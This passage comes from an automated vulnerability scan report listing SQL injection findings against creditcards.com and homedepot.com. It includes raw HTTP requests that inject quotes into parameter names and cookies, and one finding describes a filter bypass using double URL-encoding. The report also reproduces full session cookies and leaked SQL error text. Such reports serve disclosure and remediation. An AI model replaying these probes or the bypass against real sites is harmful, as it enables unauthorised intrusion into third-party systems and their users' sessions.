Date: Fri, 17 Jun 2011 10:47:52 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3554
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:52 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '1'=1'; File: /usr/local/apache2/htdocs/us_pr
...[SNIP]...

Request 2

GET /oc//%2522ns%253D%2522netsparker%25280x000132%2529)?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:52 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705475299761114&data3=0&sid=1889&c=1%27%27%3D1
Vary: Accept-Encoding
Content-Length: 2736
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:52 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.63. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditcards.com
Path:   /oc/Netsparker8d82b62392124f8783667c0217ea8f35/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/Netsparker8d82b62392124f8783667c0217ea8f35/?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:48 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3592
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:48 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '1'=1'; File: /usr/local/apache2/htdocs/us_pr
...[SNIP]...

Request 2

GET /oc/Netsparker8d82b62392124f8783667c0217ea8f35/?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:49 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705474953559178&data3=0&sid=1889&c=1%27%27%3D1
Vary: Accept-Encoding
Content-Length: 2736
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:49 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.64. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditcards.com
Path:   /oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:50 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3554
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:50 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '1'=1'; File: /usr/local/apache2/htdocs/us_pr
...[SNIP]...

Request 2

GET /oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:50 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705475022596066&data3=0&sid=1889&c=1%27%27%3D1
Vary: Accept-Encoding
Content-Length: 2736
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:50 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.65. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [Coradiantuserid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The Coradiantuserid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Coradiantuserid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026'; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:56:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:56:07 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225362328%3a%3bC25%5fEXP%3d1360065362%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:56:02 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225362328%3a%3bC25%5fEXP%3d1360065362%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:56:03 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22169%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24237%2c431%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310817363%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225362328%3a%3bC25%5fEXP%3d1360065362%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:56:03 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228963144%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ctyx2oY352axv5qf75fxp0zq43Ck%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026''; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:56:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:56:08 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225367982%3a%3bC25%5fEXP%3d1360065367%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:56:07 GMT;Path=/


1.66. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [RES_TRACKINGID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The RES_TRACKINGID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the RES_TRACKINGID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the RES_TRACKINGID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388%2527; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
